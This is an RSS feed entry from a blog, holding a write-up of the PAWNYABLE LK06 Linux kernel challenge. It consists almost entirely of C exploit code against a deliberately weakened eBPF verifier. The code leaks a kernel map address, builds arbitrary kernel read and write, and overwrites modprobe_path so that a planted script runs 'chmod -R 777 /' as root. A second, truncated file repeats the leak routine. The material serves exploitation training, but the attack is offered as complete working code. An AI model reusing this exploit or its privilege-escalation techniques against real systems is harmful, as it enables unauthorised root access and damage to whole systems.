<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Brahman on Uniguri&#39;s Blog</title>
    <link>/tags/brahman/</link>
    <description>Recent content in Brahman on Uniguri&#39;s Blog</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en-us</language>
    <lastBuildDate>Wed, 22 Jan 2025 12:31:57 +0000</lastBuildDate><atom:link href="/tags/brahman/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>PAWNYABLE LK06: Brahman</title>
      <link>/posts/kernel/pawnyable/pawnyable_lk06/</link>
      <pubDate>Wed, 22 Jan 2025 12:31:57 +0000</pubDate>
      
      <guid>/posts/kernel/pawnyable/pawnyable_lk06/</guid>
      <description>&lt;hr&gt;
&lt;h2 id=&#34;lk06-brahman&#34;&gt;LK06: Brahman&lt;/h2&gt;
&lt;h3 id=&#34;exploit-using-adjust_ptr_min_max_vals&#34;&gt;Exploit using adjust_ptr_min_max_vals&lt;/h3&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;149628537&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;149628537&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;exploit.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handler the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&amp;amp;val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  write(socks[1], &amp;#34;Hello&amp;#34;, 5);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx, &amp;amp;bpf_map_elem = 0x%016lx\n&amp;#34;, bpf_map_addr,
         bpf_map_addr + 0x110);

  const uint64_t kernel_base = aar64(bpf_map_addr) - BPF_MAP_OPS_OFFSET;
  printf(&amp;#34;[+] kernel_base: 0x%016lx\n&amp;#34;, kernel_base);

  const char* new_modprobe = &amp;#34;/tmp/evil.sh&amp;#34;;
  const size_t new_modprobe_len = strlen(new_modprobe);
  printf(&amp;#34;[*] Overwrite modprobe to %s\n&amp;#34;, new_modprobe);
  for (size_t i = 0; i &amp;lt; new_modprobe_len; i += 8) {
    aaw64(kernel_base + MODPROB_OFFSET + i, *(uint64_t*)(new_modprobe + i));
  }
  {
    int fd = open(&amp;#34;/proc/sys/kernel/modprobe&amp;#34;, O_RDONLY);
    if (fd &amp;lt; 0) {
      fatal(&amp;#34;open(/proc/sys/kernel/modprobe)&amp;#34;);
    }

    char modprobe[0x100];
    read(fd, modprobe, sizeof(modprobe));
    if (strncmp(modprobe, new_modprobe, new_modprobe_len)) {
      printf(&amp;#34;[*] new modprobe: %s\n&amp;#34;, modprobe);
      puts(&amp;#34;[-] Failed to overwrite modprobe&amp;#34;);
      return -1;
    }
    puts(&amp;#34;[+] Successfully overwritten modprobe&amp;#34;);
  }

  puts(&amp;#34;[+] Get root&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;#!/bin/sh\nchmod -R 777 /&amp;#39; &amp;gt; /tmp/evil.sh&amp;#34;);
  system(&amp;#34;chmod +x /tmp/evil.sh&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;\xde\xad\xbe\xef&amp;#39; &amp;gt; /tmp/pwn&amp;#34;);
  system(&amp;#34;chmod +x /tmp/pwn&amp;#34;);
  system(&amp;#34;/tmp/pwn&amp;#34;);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h3 id=&#34;leaks&#34;&gt;Leaks&lt;/h3&gt;
&lt;h4 id=&#34;leak-addr-of-struct-bpf_map-using-adjust_ptr_min_max_vals&#34;&gt;Leak addr of &lt;code&gt;struct bpf_map&lt;/code&gt; using &lt;code&gt;adjust_ptr_min_max_vals&lt;/code&gt;&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;546928317&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;546928317&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_bpf_map_using_adjust_ptr_min_max_vals.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handler the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

